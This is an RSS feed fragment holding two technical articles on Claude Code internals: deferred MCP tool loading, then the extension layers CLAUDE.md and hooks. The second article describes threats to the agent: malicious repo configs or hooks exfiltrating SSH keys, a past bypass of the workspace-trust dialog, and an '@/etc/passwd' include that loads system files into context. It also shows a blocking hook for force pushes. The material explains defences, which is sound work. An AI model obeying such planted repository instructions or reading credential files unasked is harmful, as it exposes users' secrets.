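            msg["content"] = [
                block for block in msg["content"]
                if block.get("type") != "tool_reference"
                or block.get("name") in available_names
            ]
    return messages
```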

&lt;h3&gt;
  
  
  The Turn Boundary Problem
&lt;/h3&gt;

&lt;p&gt;When the API server receives a &lt;code&gt;tool_result&lt;/code&gt; containing &lt;code&gt;tool_reference&lt;/code&gt; blocks, it expands them into a &lt;code&gt;&amp;lt;functions&amp;gt;&lt;/code&gt; block — the same format used for tool definitions at the start of the prompt. This expansion happens server-side, and it creates an unexpected problem in the wire format.&lt;/p&gt;

&lt;p&gt;The expanded &lt;code&gt;&amp;lt;functions&amp;gt;&lt;/code&gt; block appears inline in the conversation. If the same user message that contains the &lt;code&gt;tool_result&lt;/code&gt; also has text siblings (auto-memory reminders, skill instructions, etc.), those text blocks render as a second &lt;code&gt;Human:&lt;/code&gt; turn segment immediately after the &lt;code&gt;&amp;lt;/functions&amp;gt;&lt;/code&gt; closing tag. This creates an anomalous pattern in the conversation structure: two consecutive human turns with a functions block in between.&lt;/p&gt;

&lt;p&gt;The model learns this pattern. After seeing it several times in a conversation, it starts completing the pattern: when it encounters a bare tool result at the tail of the conversation (no text siblings), it emits the stop sequence instead of generating a meaningful response. The conversation just... stops. An A/B experiment with five arms confirmed the dose-response: more tool_reference messages with text siblings → higher stop-sequence rate.&lt;/p&gt;

&lt;p&gt;Two mitigations work in concert:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Turn boundary injection&lt;/strong&gt;: When a user message contains &lt;code&gt;tool_reference&lt;/code&gt; blocks and no text siblings, the system injects a minimal text block (&lt;code&gt;"Tool loaded."&lt;/code&gt;) as a sibling. This creates a clean &lt;code&gt;Human: Tool loaded.&lt;/code&gt; turn boundary that prevents the model from seeing a bare functions block at the tail.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sibling relocation&lt;/strong&gt;: When a user message contains &lt;code&gt;tool_reference&lt;/code&gt; blocks AND has text siblings (from auto-memory, attachments, etc.), the system moves those text blocks to the next user message that has &lt;code&gt;tool_result&lt;/code&gt; content but NO &lt;code&gt;tool_reference&lt;/code&gt;. This eliminates the anomalous two-human-turns pattern. If no valid target exists (the tool_reference message is near the end of the conversation), the siblings stay — that's safe because a tail ending in a human turn gets a proper assistant cue.&lt;/p&gt;
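&lt;p&gt;The first mitigation is small enough to sketch directly (block shapes are illustrative):&lt;/p&gt;

```python
def inject_turn_boundary(message):
    # If a user message carries tool_reference blocks and nothing else
    # textual, append a minimal text sibling so the rendered prompt gets
    # a clean "Human: Tool loaded." turn instead of a bare functions block.
    blocks = message["content"]
    has_reference = any(b.get("type") == "tool_reference" for b in blocks)
    has_text = any(b.get("type") == "text" for b in blocks)
    if has_reference and not has_text:
        blocks.append({"type": "text", "text": "Tool loaded."})
    return message
```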

&lt;h3&gt;
  
  
  Schema-Not-Sent Recovery
&lt;/h3&gt;

&lt;p&gt;Sometimes the model tries to call a deferred tool without first discovering it via ToolSearch. This happens when the model hallucinates having seen the tool's schema (perhaps from its training data) or when a prior discovery was lost to compaction. The call fails at input validation — the model sends parameters that don't match any known schema, because the schema was never sent.&lt;/p&gt;

&lt;p&gt;The raw validation error ("expected object, received string") doesn't tell the model what went wrong. So the system checks: is this a deferred tool that wasn't in the discovered set? If yes, it appends a hint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"This tool's schema was not sent to the API — it was not in the
discovered-tool set. Use ToolSearch to load it first:
ToolSearch({ query: 'select:&amp;lt;tool_name&amp;gt;' })"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This turns a confusing Zod error into an actionable instruction. The model reads the hint, calls ToolSearch, gets the schema, and retries — one extra turn instead of a conversation-ending failure.&lt;/p&gt;
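&lt;p&gt;The check-and-hint logic amounts to a set-membership test before the error is returned; a sketch with hypothetical names:&lt;/p&gt;

```python
HINT = ("This tool's schema was not sent to the API. "
        "Use ToolSearch to load it first: "
        "ToolSearch({ query: 'select:%s' })")

def explain_validation_error(tool_name, raw_error, deferred, discovered):
    # Deferred but never discovered: the schema was withheld, so the
    # validation failure is expected. Replace confusion with a next step.
    if tool_name in deferred and tool_name not in discovered:
        return raw_error + "\n" + (HINT % tool_name)
    return raw_error
```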

&lt;h3&gt;
  
  
  Invisible by Design
&lt;/h3&gt;

&lt;p&gt;ToolSearch calls never appear in the user's terminal output. The tool's &lt;code&gt;renderToolUseMessage&lt;/code&gt; returns null and its &lt;code&gt;userFacingName&lt;/code&gt; returns an empty string. In the message collapse system — which groups consecutive reads and searches into compact "Read 5 files" summaries — ToolSearch is classified as "absorbed silently": it joins a collapse group without incrementing any counter. The user sees "Read 3 files, searched 2 files" but the ToolSearch call that loaded the tool definitions is invisible.&lt;/p&gt;

&lt;p&gt;This is deliberate. ToolSearch is infrastructure, not user-facing functionality. Showing "Searched for tools" in the output would be confusing — the user asked to create a GitHub issue, not to search for tools. The tool discovery is an implementation detail of how the model accesses MCP tools, and the UI hides it accordingly.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Complete Pipeline
&lt;/h2&gt;

&lt;p&gt;Here's the full sequence for a single API request:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mode check&lt;/strong&gt;: Determine if tool search is &lt;code&gt;tst&lt;/code&gt;, &lt;code&gt;tst-auto&lt;/code&gt;, or &lt;code&gt;standard&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Model check&lt;/strong&gt;: Verify the model supports &lt;code&gt;tool_reference&lt;/code&gt; blocks. If not, disable.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Availability check&lt;/strong&gt;: Confirm ToolSearch is in the tool pool (not disallowed).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Threshold check&lt;/strong&gt; (tst-auto only): Count deferred tool tokens via API (or character heuristic fallback). Compare to &lt;code&gt;floor(contextWindow × 10%)&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Build deferred set&lt;/strong&gt;: Mark each tool as deferred or not via the priority checklist.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan history&lt;/strong&gt;: Extract discovered tool names from &lt;code&gt;tool_reference&lt;/code&gt; blocks and compact boundary snapshots.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Filter tools&lt;/strong&gt;: Include non-deferred tools, ToolSearch, and discovered deferred tools. Exclude undiscovered deferred tools.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Serialize schemas&lt;/strong&gt;: Add &lt;code&gt;defer_loading: true&lt;/code&gt; to deferred tools. Add beta header.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Announce pool&lt;/strong&gt;: Prepend deferred tool list or compute delta attachment.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Send request&lt;/strong&gt;: API receives full definitions with &lt;code&gt;defer_loading&lt;/code&gt;, shows only non-deferred and discovered tools to the model.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Model searches&lt;/strong&gt;: Calls ToolSearch with a query. Gets &lt;code&gt;tool_reference&lt;/code&gt; blocks back.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Next turn&lt;/strong&gt;: Step 6 finds the new references. Step 7 includes the discovered tools. The model can now call them.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Compaction&lt;/strong&gt;: Before summarizing, snapshot discovered tools to boundary marker. After compaction, step 6 reads the snapshot.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
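&lt;p&gt;The filtering in steps 5–7 can be sketched as a small function. This is an illustrative reconstruction, not the actual implementation; only the &lt;code&gt;tool_reference&lt;/code&gt; block shape comes from the article:&lt;/p&gt;

```python
# Hypothetical sketch of steps 5-7: given the deferred set, scan the
# conversation history for discovered tools, then decide which tool
# definitions the model actually sees this turn.

def filter_tools(all_tools, deferred_names, history):
    # Step 6: collect names the model discovered via tool_reference blocks.
    discovered = set()
    for message in history:
        for block in message.get("content", []):
            if block.get("type") == "tool_reference":
                discovered.add(block["name"])

    # Step 7: non-deferred tools always ship; deferred tools ship only
    # once they have been discovered in an earlier search.
    visible = []
    for tool in all_tools:
        name = tool["name"]
        if name not in deferred_names or name in discovered:
            visible.append(tool)
    return visible
```

&lt;p&gt;ToolSearch itself would always sit in the non-deferred set, so it survives this filter on every turn.&lt;/p&gt;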

&lt;p&gt;Each step fails toward loading more tools, not fewer. Unknown model? Load everything. Token count unavailable? Use conservative heuristic. Proxy detected? Load everything unless explicitly opted in. The worst case is wasting tokens on tool definitions. The best case is saving 90% of tool definition tokens while maintaining full functionality through on-demand discovery.&lt;/p&gt;

&lt;p&gt;The system turns an O(N) per-turn cost into O(1) for idle tools and O(k) for the k tools actually used in a conversation. For a user with 200 MCP tools who typically uses 5–10 per session, that's a 95% reduction in tool definition tokens — context space reclaimed for actual work.&lt;/p&gt;




&lt;h2&gt;
  
  
  Design Trade-offs
&lt;/h2&gt;

&lt;p&gt;Every engineering decision in this system reflects a trade-off. Here are the ones worth understanding:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Deferral granularity&lt;/strong&gt;: Why defer by tool, not by MCP server? Server-level deferral would mean discovering one tool loads all tools from that server. This is simpler but wasteful — a GitHub server might have 40 tools, and you only need 3. Tool-level deferral uses more search turns but saves more tokens. The scoring system mitigates the extra turns: a single keyword search for "github" returns the most relevant tools, not all 40.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Negative vs. positive model list&lt;/strong&gt;: The unsupported model list (&lt;code&gt;["haiku"]&lt;/code&gt;) means every new model gets tool search by default. The alternative — a positive list of supported models — would mean every new model launch requires a code update. The negative list risks sending &lt;code&gt;tool_reference&lt;/code&gt; blocks to a model that can't handle them, but the API would return a clear error, and the feature flag system can add models to the unsupported list within minutes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Token counting precision&lt;/strong&gt;: The character-per-token heuristic (2.5) is intentionally imprecise. Why not always use the API's token counter? Because the counter requires a network round-trip that might fail or add latency. The heuristic runs instantly. And the cost of over-counting (deferring when unnecessary) is one extra search turn. The cost of under-counting (not deferring when needed) is 60,000 wasted tokens per turn. The asymmetry favors the conservative heuristic.&lt;/p&gt;
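&lt;p&gt;The heuristic is simple enough to sketch. The 2.5 characters-per-token ratio and the 10% threshold come from the article; the function names and schema serialization are assumptions:&lt;/p&gt;

```python
import json
import math

CHARS_PER_TOKEN = 2.5  # conservative ratio from the article

def estimate_deferred_tokens(tool_schemas):
    # Serialize each schema and divide characters by the ratio; rounding
    # up keeps the estimate conservative (over-counting is the cheap error).
    chars = sum(len(json.dumps(schema)) for schema in tool_schemas)
    return math.ceil(chars / CHARS_PER_TOKEN)

def should_defer(tool_schemas, context_window):
    # Defer once the estimate reaches 10% of the context window.
    threshold = math.floor(context_window * 0.10)
    return estimate_deferred_tokens(tool_schemas) >= threshold
```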

&lt;p&gt;&lt;strong&gt;Cache key design&lt;/strong&gt;: Both the description cache and token count cache use the sorted tool name list as key, not a hash. This means cache comparison is O(N) in the number of deferred tools, but N is typically &amp;lt;200 and the comparison runs once per API request. A hash would be O(1) but risks collisions, and debugging cache issues with hashed keys is harder than with readable name lists.&lt;/p&gt;
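&lt;p&gt;A minimal sketch of the readable-key idea, with the cache structure assumed for illustration. The point is that the key is the sorted name list itself, not a digest:&lt;/p&gt;

```python
_token_count_cache = {}

def cache_key(deferred_tools):
    # Sorting makes the key independent of tool order; a tuple of names
    # stays human-readable when inspecting cache contents.
    return tuple(sorted(tool["name"] for tool in deferred_tools))

def cached_token_count(deferred_tools, count_fn):
    key = cache_key(deferred_tools)
    if key not in _token_count_cache:
        _token_count_cache[key] = count_fn(deferred_tools)
    return _token_count_cache[key]
```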

&lt;p&gt;&lt;strong&gt;Snapshot vs. protection&lt;/strong&gt;: Why snapshot discovered tools instead of protecting &lt;code&gt;tool_reference&lt;/code&gt; messages from compaction? The snip compaction strategy does protect these messages, but full compaction summarizes everything. Protecting individual messages from full compaction would fragment the summary and reduce its quality. The snapshot approach lets compaction work normally and reconstructs the discovery state from metadata.&lt;/p&gt;

</description>
      <category>claudecode</category>
      <category>mcp</category>
      <category>architecture</category>
      <category>aiagents</category>
    </item>
    <item>
      <title>How Claude Code Extends Itself: Skills, Hooks, Agents, and MCP</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Wed, 08 Apr 2026 03:06:40 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/how-claude-code-extends-itself-skills-hooks-agents-and-mcp-55pd</link>
      <guid>https://dev.to/oldeucryptoboi/how-claude-code-extends-itself-skills-hooks-agents-and-mcp-55pd</guid>
      <description>&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;You want Claude Code to know your team's conventions, run your linter after every edit, delegate research to a background worker, and call your internal APIs through custom tools. These are four different extension problems, and the naive approach — one plugin system that does everything — fails because each problem has a fundamentally different trust profile.&lt;/p&gt;

&lt;p&gt;Consider a team's coding conventions. These are passive instructions — text the model reads but never executes. They need no sandbox, no permissions, no isolation. Now consider a linter that runs after every file write. This is active code that executes on your machine in response to the model's actions. It needs a trust boundary: what if a malicious project's config file registers a hook that exfiltrates your SSH keys? Now consider a background research agent. It needs its own conversation, its own tool access, its own abort controller — but it must not silently approve dangerous operations. And a custom tool server? It's a separate process speaking a protocol, potentially remote, potentially untrusted.&lt;/p&gt;

&lt;p&gt;One extension system can't handle all of these safely. Passive instructions with no execution risk get the same UX as remote tool servers that can exfiltrate data? That's either too permissive for tools or too restrictive for instructions.&lt;/p&gt;

&lt;p&gt;The design principle is &lt;strong&gt;layered trust with fail-closed defaults&lt;/strong&gt;. Each extension type gets exactly the trust boundary its threat model requires. Instructions are injected as text — no execution, no permissions needed. Hooks execute deterministic code — sandboxed, workspace-trust-gated, exit-code-based control flow. Agents get isolated conversations with scoped tool access — permission prompts bubble to the parent. Tool servers run out-of-process with namespaced capabilities and enterprise policy controls. Unknown extension types don't silently succeed — they don't exist.&lt;/p&gt;

&lt;p&gt;This article traces six extension systems in execution order: CLAUDE.md (instructions), hooks (lifecycle callbacks), skills (reusable prompts), the tool pool (built-in + external), MCP (external tool servers), and agents (delegated execution). Each one exists because the others can't solve its problem safely.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 1: CLAUDE.md — Instructions as Text
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem It Solves
&lt;/h3&gt;

&lt;p&gt;Every project has conventions. "Use bun, not npm." "Always run tests before committing." "Never modify the migration files directly." These need to reach the model on every turn, survive context compaction, and compose across nested directories — without executing anything.&lt;/p&gt;

&lt;h3&gt;
  
  
  How Discovery Works
&lt;/h3&gt;

&lt;p&gt;Imagine you're working in &lt;code&gt;/home/alice/projects/myapp/src/components/&lt;/code&gt;. The system walks upward:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/home/alice/projects/myapp/src/components/
/home/alice/projects/myapp/src/
/home/alice/projects/myapp/
/home/alice/projects/
/home/alice/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At each directory, it looks for three things:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;CLAUDE.md&lt;/code&gt; (checked-in project instructions)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.claude/CLAUDE.md&lt;/code&gt; (same, nested in config dir)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.claude/rules/*.md&lt;/code&gt; (individual rule files)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But not all directories are equal. The full discovery hierarchy has six tiers, loaded in order from lowest to highest priority:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. Managed      — /etc/claude-code/CLAUDE.md (enterprise policy, always loaded)
2. User         — ~/.claude/CLAUDE.md (your personal global instructions)
3. Project      — CLAUDE.md files found walking up from cwd
4. Local        — CLAUDE.local.md (gitignored, private per-developer)
5. AutoMemory   — ~/.claude/projects/.../memory/MEMORY.md (persistent learning)
6. TeamMemory   — Shared team memory (experimental)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Priority matters because the model pays more attention to later content. Your project's "use bun" instruction at tier 3 takes precedence over a user-level "use npm" at tier 2. Enterprise policy at tier 1 is loaded first, before everything else, and its presence is structurally guaranteed: no lower-priority tier can remove or suppress it.&lt;/p&gt;
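&lt;p&gt;The walk itself is straightforward. A minimal sketch of the project tier only, assuming the two &lt;code&gt;CLAUDE.md&lt;/code&gt; locations listed above (the &lt;code&gt;.claude/rules/*.md&lt;/code&gt; globbing and the other tiers are omitted):&lt;/p&gt;

```python
import os

def discover_project_instructions(cwd):
    # Walk upward from cwd to the filesystem root, collecting any
    # CLAUDE.md or .claude/CLAUDE.md found along the way.
    found = []
    current = os.path.abspath(cwd)
    while True:
        for candidate in ("CLAUDE.md", os.path.join(".claude", "CLAUDE.md")):
            path = os.path.join(current, candidate)
            if os.path.isfile(path):
                found.append(path)
        parent = os.path.dirname(current)
        if parent == current:   # reached the filesystem root
            break
        current = parent
    # Deepest directory last: later content gets more model attention.
    return list(reversed(found))
```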

&lt;h3&gt;
  
  
  The Include System
&lt;/h3&gt;

&lt;p&gt;A CLAUDE.md can reference other files:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="gh"&gt;# Project Rules&lt;/span&gt;
@./docs/coding-standards.md
@./docs/api-conventions.md
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;@&lt;/code&gt; directive pulls in external files as separate instruction entries. Resolution rules:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;@./relative&lt;/code&gt; — relative to the including file's directory&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;@~/path&lt;/code&gt; — relative to home&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;@/absolute&lt;/code&gt; — absolute path&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Circular includes are tracked by recording every processed path in a set. If file A includes B and B includes A, the second inclusion is silently skipped.&lt;/p&gt;

&lt;p&gt;Security: only whitelisted text file extensions are loadable — over 100 extensions covering code, config, and documentation formats. Binary files (images, PDFs, executables) are rejected. This prevents a crafted include path from loading arbitrary binary data into the model's context.&lt;/p&gt;
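&lt;p&gt;The resolution and cycle-tracking rules above fit in a short recursive function. A sketch under the article's rules, with the directive regex and entry shape assumed (the extension whitelist check is omitted):&lt;/p&gt;

```python
import os
import re

# A line consisting of "@" followed by a path is an include directive.
INCLUDE_RE = re.compile(r"^@(\S+)\s*$", re.MULTILINE)

def resolve_includes(path, seen=None):
    # Every processed path is recorded; a repeat visit is silently skipped,
    # which is exactly how A-includes-B-includes-A terminates.
    seen = set() if seen is None else seen
    real = os.path.realpath(path)
    if real in seen:
        return []
    seen.add(real)
    with open(real) as f:
        text = f.read()
    entries = [(real, text)]
    for match in INCLUDE_RE.finditer(text):
        target = match.group(1)
        if target.startswith("~"):
            target = os.path.expanduser(target)                   # @~/path
        elif not os.path.isabs(target):
            target = os.path.join(os.path.dirname(real), target)  # @./relative
        if os.path.isfile(target):
            entries.extend(resolve_includes(target, seen))
    return entries
```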

&lt;h3&gt;
  
  
  Conditional Rules
&lt;/h3&gt;

&lt;p&gt;Rule files can have frontmatter that restricts when they activate:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;src/api/**&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
Never use raw SQL queries in API handlers. Always use the query builder.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This rule only appears when the model is working on files matching &lt;code&gt;src/api/**&lt;/code&gt;. The matching uses gitignore-style patterns — the same library that handles &lt;code&gt;.gitignore&lt;/code&gt;, so glob semantics are consistent. Rules without a &lt;code&gt;paths&lt;/code&gt; field apply unconditionally.&lt;/p&gt;
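&lt;p&gt;A minimal sketch of the filtering step. The real system uses a gitignore-style matcher; stdlib &lt;code&gt;fnmatch&lt;/code&gt; here is a coarser stand-in (its &lt;code&gt;*&lt;/code&gt; also crosses &lt;code&gt;/&lt;/code&gt;), used only to show the flow:&lt;/p&gt;

```python
from fnmatch import fnmatch

def active_rules(rules, touched_file):
    # A rule is a (pattern, text) pair; pattern None means unconditional.
    selected = []
    for pattern, text in rules:
        if pattern is None or fnmatch(touched_file, pattern):
            selected.append(text)
    return selected
```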

&lt;h3&gt;
  
  
  How Instructions Reach the Model
&lt;/h3&gt;

&lt;p&gt;All discovered files are concatenated into a single block, wrapped in a system-reminder tag, and injected as part of a user message — not the system prompt. This is a deliberate choice: system prompt content is cached aggressively, but CLAUDE.md content can change between turns (the user might edit a file). By injecting it as user-message content, it gets re-read on every turn without invalidating the system prompt cache.&lt;/p&gt;

&lt;p&gt;The instruction block carries a header that tells the model these instructions override default behavior — a prompt-level enforcement that complements the structural priority ordering.&lt;/p&gt;

&lt;h3&gt;
  
  
  Fail-Closed Properties
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Unknown file extensions in &lt;code&gt;@include&lt;/code&gt; → silently skipped (no binary loading)&lt;/li&gt;
&lt;li&gt;File read errors (ENOENT, EACCES) → silently skipped (missing files don't crash)&lt;/li&gt;
&lt;li&gt;Circular includes → tracked and deduplicated&lt;/li&gt;
&lt;li&gt;Frontmatter parse errors → content loaded without conditional filtering (fail-open on conditions, fail-closed on content)&lt;/li&gt;
&lt;li&gt;HTML comments → stripped (authorial notes don't reach the model)&lt;/li&gt;
&lt;li&gt;AutoMemory → truncated after 200 lines (prevents unbounded context growth)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Trade-Off: Safety Over Convenience
&lt;/h3&gt;

&lt;p&gt;External includes (files outside the project root) require explicit approval. A CLAUDE.md in a cloned repository can't silently &lt;code&gt;@/etc/passwd&lt;/code&gt; to exfiltrate system files into the model's context. The user must approve external includes once per project — a one-time friction that prevents a class of supply-chain attacks where a malicious repo's instructions load sensitive files.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 2: Hooks — Deterministic Lifecycle Callbacks
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem It Solves
&lt;/h3&gt;

&lt;p&gt;You want to run your linter after every file write. You want to block the model from committing to main. You want to send a webhook when a session ends. These are deterministic actions — no LLM judgment needed — that execute in response to specific lifecycle events.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Attack That Shaped the Design
&lt;/h3&gt;

&lt;p&gt;Early in development, a vulnerability was discovered: a project's &lt;code&gt;.claude/settings.json&lt;/code&gt; could register SessionEnd hooks that executed when the user declined the workspace trust dialog. The user says "I don't trust this workspace" and the workspace's code runs anyway. This led to a blanket rule: &lt;strong&gt;all hooks require workspace trust&lt;/strong&gt;. In interactive mode, no hook executes until the user has explicitly accepted the trust dialog.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hook Events
&lt;/h3&gt;

&lt;p&gt;Hooks fire at ~28 lifecycle points. The most important ones:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PreToolUse    — Before any tool executes (can block, modify input, or allow)
PostToolUse   — After successful tool execution (can inject context)
Stop          — Before the model stops (can force continuation)
SessionStart  — When a session begins
SessionEnd    — When a session ends (1.5-second timeout, not 10 minutes)
Notification  — When the system sends a notification
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each event carries structured JSON input — the tool name, the tool's input, session IDs, working directory, and more.&lt;/p&gt;

&lt;h3&gt;
  
  
  Four Hook Types
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Command hooks&lt;/strong&gt; spawn a shell process (bash or PowerShell). The hook's JSON input is written to stdin. The process's exit code determines the outcome:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Exit 0  →  Success (continue normally)
Exit 2  →  Blocking error (prevent the action)
Exit 1  →  Non-blocking error (log and continue)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the process writes JSON to stdout matching the hook output schema, that JSON controls behavior — permission decisions, additional context, modified tool input. If stdout isn't JSON, it's treated as plain text feedback.&lt;/p&gt;

&lt;p&gt;A concrete example: a PreToolUse hook that blocks dangerous git operations:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/bash&lt;/span&gt;
&lt;span class="c"&gt;# Read JSON input from stdin&lt;/span&gt;
&lt;span class="nv"&gt;INPUT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;TOOL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$INPUT&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.tool_name'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;COMMAND&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$INPUT&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.tool_input.command // empty'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$TOOL&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Bash"&lt;/span&gt; &lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$COMMAND&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-q&lt;/span&gt; &lt;span class="s2"&gt;"git push.*--force"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
  &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'{"decision": "block", "reason": "Force push blocked by policy"}'&lt;/span&gt;
  &lt;span class="nb"&gt;exit &lt;/span&gt;2
&lt;span class="k"&gt;fi
&lt;/span&gt;&lt;span class="nb"&gt;exit &lt;/span&gt;0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The exit code and JSON output are redundant by design — either mechanism can block. Exit code 2 without JSON still blocks. JSON &lt;code&gt;{"decision": "block"}&lt;/code&gt; without exit code 2 still blocks. This redundancy means a hook that crashes mid-output (writing partial JSON) still has the exit code as a fallback signal.&lt;/p&gt;

&lt;p&gt;On Windows, command hooks run through Git Bash, not cmd.exe. Every path in environment variables is converted from Windows format (&lt;code&gt;C:\Users\foo&lt;/code&gt;) to POSIX format (&lt;code&gt;/c/Users/foo&lt;/code&gt;) — Git Bash can't resolve Windows paths. PowerShell hooks skip this conversion and receive native paths.&lt;/p&gt;
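&lt;p&gt;The drive-letter conversion can be sketched as a one-line transform. The real tool's edge-case handling (UNC paths, mixed separators) is not documented here, so this covers only the pattern described above:&lt;/p&gt;

```python
import re

# Matches a leading Windows drive prefix such as "C:\" or "C:/".
DRIVE_RE = re.compile(r"^([A-Za-z]):[\\/]")

def to_posix_path(win_path):
    match = DRIVE_RE.match(win_path)
    if not match:
        return win_path  # already POSIX (or not a drive-rooted path)
    drive = match.group(1).lower()
    rest = win_path[match.end():].replace("\\", "/")
    return "/" + drive + "/" + rest
```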

